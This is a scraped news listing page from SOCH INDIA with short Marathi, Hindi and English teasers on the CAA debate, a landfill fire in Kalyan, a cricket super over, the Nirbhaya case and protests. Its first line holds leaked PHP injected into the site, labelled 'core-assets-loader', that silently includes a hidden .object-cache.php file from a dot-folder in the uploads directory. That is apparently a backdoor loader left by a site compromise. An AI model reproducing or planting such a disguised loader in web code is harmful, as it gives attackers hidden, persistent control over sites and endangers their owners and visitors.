add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); समाचार – SOCH INDIA
Menu

In a diplomatic win for India, expected vote on the controversial Citizenship Amendment Act by Members of the European Parliament today has been postponed till March. The debate opened with a statement by Helena Dalli, the Vice-President of the European Commission and High Representative of the Union for Foreign Affairs...

Read More

नवीन वर्षांपासून सिडकोने पाणीपट्टी ऑनलाइनच (रोखरहित) भरण्याची सक्ती करीत देयकांची रोखीने रक्कम स्वीकारणाऱ्या खिडक्या बंद केल्या आहेत. त्यामुळे सिडको वसाहतीतील नागरिकांची अडचण होत आहे. त्यांना यासाठी अतिरिक्त पैसै मोजावे लागत आहेत. त्यामुळे सिडकोने अगोदर नागरिकांचे प्रबोधन करावे, तोपर्यंत रोखीचा पर्याय उपलब्ध करून द्यावा, अशी मागणी नागरिक करीत आहेत. सिडको...

Read More

कल्याण पश्चिमेतील आधारवाडी कचराभूमीला बुधवारी दुपारी आग लागली. वाऱ्यामुळे ही आग चहुबाजूंनी पसरली आणि काही क्षणात धुराचे लोट अवघ्या कल्याण शहरावर पसरले. कचराभूमीपासून एक किमीच्या परिघात हे धुराचे लोट पसरल्याने येथील रहिवाशांना श्वसनाचा त्रास होऊ लागला. सायंकाळी उशिरापर्यंत ही आग आटोक्यात आली नव्हती. आग लागण्याचे नेमके कारणदेखील अद्याप स्पष्ट...

Read More

न्यूझीलंडविरुद्धच्या रोमांचक मॅचमध्ये भारताचा सुपर ओव्हरमध्ये विजय झाला आहे. सुपर ओव्हरमध्ये शेवटच्या २ बॉलवर १० रनची गरज असताना रोहित शर्माने टीम साऊदीच्या दोन्ही बॉलला सिक्स मारून भारताला मॅच जिंकवून दिली. सुपर ओव्हरमध्ये भारताला विजयासाठी १७ रनची गरज होती. मॅच टाय झाल्यानंतर न्यूझीलंडकडून केन विलियमसन आणि मार्टिन गप्टील बॅटिंगला आले....

Read More

दिल्ली पोलिसांनी सुधारित नागरिकत्व कायदा (सीएए) विरोधात दिल्लीतील जामिया मिलिया इस्लामिया विद्यापीठात घडलेल्या हिंसाचारात आरोपी असलेल्या तब्बल ७० जणांचे फोटो दिल्ली गुन्हे शाखा पोलिसांनी सादर केले आहेत. या आरोपींची माहिती देणाऱ्यांना दिल्ली पोलिसांकडून बक्षीस देखील दिले जाणार आहे. १५ डिसेंबर रोजी सीएए विरोधात जामिया विद्यापीठातील आंदोलनादरम्यान हिंसाचार उफळला होता....

Read More

निर्भया के हत्यारों की फांसी फिर टल सकती है. फांसी की सजा से बचने के लिए चारों दोषियों में से एक विनय ने नया पैतरा चला है. विनय के वकील एपी सिंह ने दया याचिका दाखिल कर दी है. बुधवार को राष्ट्रपति के पास दया याचिका दाखिल की गई....

Read More

सुधारित नागरिकत्व कायदा (सीएए) व राष्ट्रीय नागरिक नोंदणी(एनआरसी) विरोधात बहुजन क्रांती मोर्चा, ट्रेड युनियन्ससह अन्य संघटनामार्फत आज भारत बंदचे आवाहन करण्यात आलेले आहे. या बंदला राज्यभरात संमिश्र प्रतिसाद मिळताना दिसत आहे. काही ठिकाणी एसटी बसवर दगडफेकही झाली आहे. तर, पुण्यात आंदोलन करणाऱ्या २५० पेक्षा अधिक जणांना पोलिसांनी ताब्यात घेतले...

Read More

राजधानी दिल्ली में आगामी चुनाव को लेकर सभी राजनीतिक पार्टियां प्रचार में जुटी हैं. दिल्ली चुनाव में बिहार के मु्ख्यमंत्री नीतीश कुमार बीजेपी के पूर्व अध्यक्ष और केंद्रीय मंत्री अमित शाह के साथ प्रचार करेंगे. नीतीश कुमार और अमित शाह 2 फरवरी को दिल्ली के बुराड़ी इलाके में साझा...

Read More

‘भारतीय संस्कृतीत आदर्श म्हणून श्रीरामांकडे पाहिले जाते. श्रीरामाला मानणाऱ्यांची संख्या मोठी आहे. मात्र, श्रीरामांप्रमाणे आचरण करणे कठीण आहे,’ असे मत केंद्रीय मनुष्यबळ विकास मंत्री डॉ. रमेश पोखरियाल निशंक यांनी सोमवारी मांडले. भारतीय छात्र संसद फाऊंडेशन, एमआयटी विश्वशांती विद्यापीठातर्फे २० ते २३ फेब्रुवारीदरम्यान दिल्लीत होणाऱ्या दहाव्या छात्र संसदेनिमित्त निशंक यांच्या...

Read More

स्टँडअप कॉमेडिअन कुणाल कामरावर इंडिगोनं सहा महिन्यांची, एअर इंडियानं अनिश्चित काळासाठी बंदी घातली आहे. पत्रकार अर्णब गोस्वामी यांच्याबरोबर चुकीचं वर्तन केल्याचं कारण देत दोन्ही कंपन्यांनी हा निर्णय घेतला आहे. या निर्णयाचं केंद्रीय हवाई वाहतूक मंत्र्यांनीही समर्थन केलं आहे. विमान कंपन्यांच्या निर्णयावर नेटकरी संतापले आहेत. कुणालवर बंदी घातली, मग खासदार...

Read More